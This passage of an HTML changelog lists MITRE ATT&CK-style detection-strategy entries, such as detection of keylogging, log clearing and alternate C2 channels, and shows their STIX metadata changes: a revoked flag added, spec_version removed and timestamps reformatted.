black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0360] Behavioral Detection of Domain Group Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0010] Behavioral Detection of Event Triggered Execution Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0590] Behavioral Detection of External Website Defacement across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0499] Behavioral Detection of Fallback or Alternate C2 Channels</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0184] Behavioral Detection of Indicator Removal Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0102] Behavioral Detection of Input Capture Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0357] Behavioral Detection of Internet Connection Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0089] Behavioral Detection of Keylogging Activity Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0114] Behavioral Detection of Local Group Enumeration Across OS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0520] Behavioral Detection of Log File Clearing on Linux and macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0266] Behavioral Detection of Mailbox Data and Log Deletion for Anti-Forensics</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0078] Behavioral Detection of Malicious Cloud API Scripting</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0140] Behavioral Detection of Malicious File Deletion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0127] Behavioral Detection of Masquerading Across Platforms via Metadata and Execution Discrepancy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0529] Behavioral Detection of Native API Invocation via Unusual DLL Loads and Direct Syscalls</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0049] Behavioral Detection of Network History and Configuration Tampering</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td 